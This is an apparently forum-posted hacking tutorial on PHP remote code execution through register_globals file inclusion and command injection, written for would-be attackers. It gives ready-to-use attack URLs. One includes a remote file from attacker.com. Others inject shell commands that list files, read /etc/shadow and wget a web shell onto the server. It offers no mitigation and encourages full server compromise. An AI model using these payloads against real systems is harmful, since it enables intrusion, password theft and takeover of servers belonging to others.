[LEGITimacy™]

As the name suggests, this vulnerability allows an attacker to run arbitrary, system level code on the vulnerable server and retrieve any desired information contained therein. Improper coding errors lead to this vulnerability. This web application vulnerability is very hard to find and discover, but if found your in for a great treat : >


Basic overview of what causes this this vulnerability:

Exploiting register_globals in PHP: Register_globals is a PHP setting that controls the availability of "superglobal" variables in a PHP script (such as data posted from a user's form, URL-encoded data, or data from cookies). In earlier releases of PHP, register_globals was set to "on" by default, which made a developer's life easier - but this lead to less secure coding and was widely exploited. When register_globals is set to "on" in php.ini, it can allow a user to initialize several previously uninitialized variables remotely. Many a times an uninitialized parameter is used to include unwanted files from an attacker, and this could lead to the execution of arbitrary files from local/remote locations. For example:

PHP Code:

require ($page . ".php"); 


Here if the $page parameter is not initialized and if register_globals is set to "on," the server will be vulnerable to remote code execution by including any arbitrary file in the $page parameter. Now let's look at the exploit code:

PHP Code:

http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt 


In this way, the file "http://www.attacker.com/attack.txt" will be included and executed on the server. It is a very simple but effective attack.

The attack.txt can be your shell and you can use http live headers and tamper data to get your shell to be a php file. But thats just something small you can do, sometimes you may have to add ";" (without qoutes) to the front of the link and after.

Now how to use RCE to execute server commands:

PHP Code:

http://www.vulnsite.com/index?id=; ls; 


This command above will list all the files in the current directory that we are in. If you have the right privs. But most of the time you dont so you have to know your way around a linux based server and use the "cat" command to read password files or mysql files. But this would only be needed if you have low privs and cant "wget" anything to the server, "wget = upload" just linux command for it.

Example for using cat to read files:

PHP Code:

http://www.vulnsite.com/index?id=; cat /etc/shadow; 


This command will print out what is inside the shadow file which is a password file.

Example to use wget to upload shell or exploit:

PHP Code:

http://www.vulnsite.com/index.php?id=; wget http://www.mysite.com/shell.php; 


As you can see exploiting this vulnerability is easy, The real trick is for all the windows users who dont know unix environments and commands. I would become familiar with these commands and files because most web servers today are unix based. So key is look up basic linux commands and get to know where basic default password files and configuration files are at on a web server. Do these things and this type of vuln can lead to full O.S. compromise or server compromise.

Good luck to you guys and hope this expands your knowledge on different types of web application vulnerabilities : >